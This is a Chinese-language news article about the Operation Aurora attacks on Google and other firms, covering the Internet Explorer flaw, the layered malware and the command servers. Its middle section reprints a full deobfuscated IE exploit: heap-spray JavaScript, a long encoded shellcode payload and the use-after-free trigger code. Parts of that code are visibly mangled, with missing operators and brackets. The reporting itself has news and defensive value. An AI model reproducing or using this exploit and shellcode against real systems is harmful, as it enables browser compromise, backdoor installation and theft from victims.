極光行動：攻擊Google的代碼曝光

TechWeb旗下的DarkReading發表文章，透露iDefense已經收回之前發佈的Adobe PDF漏洞導致Google被攻擊的聲明，承認McAfee所說的IE漏洞纔是禍源。

文章還給出了一個鏈接，指向開源滲透測試工具項目Metasploit的博客，上面給出了利用這個IE漏洞的攻擊代碼鏈接。代碼如下：

【去混淆後的代碼】

 

Evals

• var n = unescape("%u0c0d%u0c0d");
  while (n.length = 524288)n += n;
  n = n.substring(0, 524269 - sc.length);
  var x = new Array();
  for (var i = 0; i  200; i ++ ){
    x[i] = n + sc;
  }
  

  (repeated 1 time)

Writes

• htmlscriptvar sc = unescape("
  %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
  %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
  %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
  %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
  %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
  %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
  %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
  %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
  %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
  %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
  %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
  %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
  %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
  %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
  %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
  %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
  %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
  %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
  %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
  %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
  %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
  %ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
  %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
  %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
  %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
  %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
  %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
  %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
  %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
  %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
  %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
  %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
  %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
  %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
  %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
  %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
  %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
  %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
  %ubcb9%ub2f6%ubfa8%u00d8");
  var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
  238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
  728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
  350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
  805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
  322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
  224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
  735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
  735, 651, 427, 770, 301, 805, 693, 413, 875);
  var arr = new Array;
  for (var i = 0; i  sss.length; i ++ ){
    arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
    );
    cc = cc.replace(/@/g, ",");
    eval(cc);
    var x1 = new Array();
    for (i = 0; i  200; i ++ ){
      x1[i] = document.createElement("COMMENT");
      x1[i].data = "abc";
    }
    ;
    var e1 = null;
    function ev1(evt){
      e1 = document.createEventObject(evt);
      document.getElementById("sp1").innerHTML = "";
      window.setInterval(ev2, 50);
    }
    function ev2(){
      p = "
  /u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d
  /u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d
  /u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d/u0c0d";
      for (i = 0; i  x1.length; i ++ ){
        x1[i].data = p;
      }
      ;
      var t = e1.srcElement;
    }
  /scriptspan id="sp1"IMG SRC="aaa.gif" οnlοad="ev1(event)"/span/body/html
  

  (repeated 1 time)

 

微軟也發佈了對這個漏洞的更新分析，表明Windows XP上的IE 6最爲危險。值得一提的是，文章特別感謝了CSDN專家博客暨《程序員》雜誌專欄作者、微軟中國的褚誠雲。我們會盡快邀請褚誠雲寫出更深入的分析文章。

還有專家用視頻演示了攻擊過程。

此前，《連線》雜誌文章給出了大量攻擊細節。

文章引述McAfee公司的話，說（攻擊Google的）黑客使用了前所未有的戰術，組合了加密、隱祕編程技術和IE中的未知漏洞，意圖是竊取Google、Adobe和許多其他大公司的源代碼。

該公司威脅研究副總裁Dmitri Alperovitch說：在國防工業之外，我們從未見過商業行業的公司遭受過如此複雜程度的攻擊。

Alperovitch說，攻擊者使用了十幾種惡意代碼和多層次的加密，深深地挖掘進了公司網絡內部，並巧妙掩蓋自己的活動。在掩飾攻擊和防範常規偵測方法上，他們的加密非常成功。我們從未見過這種水平的加密。非常高超。

McAfee之所以將這種攻擊命名爲Auroro（極光），是因爲他們發現，黑客在將惡意代碼編譯爲可執行文件時，編譯器將攻擊者機器上的路徑名插入代碼中。

在IE漏洞被曝光後，微軟很快發佈了針對性的安全建議書。而McAfee也在其產品中增加了偵測這種攻擊所用惡意代碼的功能。

雖然最初的攻擊始自公司僱員訪問惡意網站，但是研究人員還在試圖確定網站的URL是通過郵件、聊天程序還是其他方式，比如Facebook或者其他社會化網站。

當用戶訪問惡意網站的時候，他們的IE瀏覽器將被襲擊，自動而且祕密地下載一系列惡意代碼到計算機中。這些代碼就像俄羅斯套娃那樣，一個跟着一個地下載到系統中。

Alperovitch表示，最初的攻擊代碼是經過三次加密的shell code，用來激活漏洞挖掘程序。然後它執行從外部機器下載的程序，後者也是加密的，而且會從被攻擊機器上刪除第一個程序。這些加密的二進制文件將自己打包爲幾個也被加密的可執行文件。

其中一個惡意程序會打開一個遠程後門，建立一個加密的祕密通道，僞裝爲一個SSL鏈接以避免被偵測到。這樣攻擊者就可以對被攻擊機器進行訪問，將它作爲灘頭陣地，繼續進攻網絡上的其他部分，搜索登錄憑據、知識產權和其他要找的東西。

McAfee因參與攻擊調查，從被攻擊公司那裏得到了攻擊所用的一些惡意代碼副本，並在幾天前加強了自己的產品。

對於另一家安全企業iDefense之前所說的有些攻擊使用了Trojan.Hydraq木馬，Alperovitch表示，他發現的惡意代碼此前任何反病毒廠商都不知道。

iDefense還說攻擊者使用了惡意PDF附件和Adobe PDF程序的漏洞，而Alperovitch說，他調查的公司裏沒有發現這種情況。但他表示攻擊不同公司的方法可能不同，不限於IE漏洞。

當黑客進入系統後，他們將數據發送給位於美國伊利諾依州和得克薩斯州以及中國臺灣的指揮控制服務器。Alperovitch所沒有識別到美國的系統牽涉到這次攻擊，也沒有提到攻擊者的戰果。但Rackspace報告他們無意中在攻擊中發揮了少量作用。而iDefense則表示攻擊者的目標是許多公司的源碼庫，而且很多情況下都成功得手。

Alperovitch說攻擊看上去是從12月15日開始的，但也有可能更早。似乎結束於1月4日，那一天，用來與惡意代碼傳輸數據的指揮控制服務器被關閉。

他說：我們不知道服務器是由攻擊者關閉的，還是其他組織關閉的。但是從那時起，攻擊停止了。

Aperovitch還指出，攻擊的時機非常好，是在假日期間，公司的運營中心和安全響應團隊人手很少。攻擊的複雜程度令人印象深刻，是那種此前僅針對國防工業的攻擊類型。一般對於商業部門，攻擊只是爲了獲取財務方面的信息，通常是通過SQL注入攻擊公司的網站，或者攻擊公司不安全的無線網絡。網絡罪犯一般不會花大量的時間把攻擊精雕細刻到如此程度，每個方面都採取混淆/加密防範。

McAfee還掌握了更多攻擊細節，但目前不準備公佈。他們已經與美國執法部門合作，並將這一問題告知美國各級政府。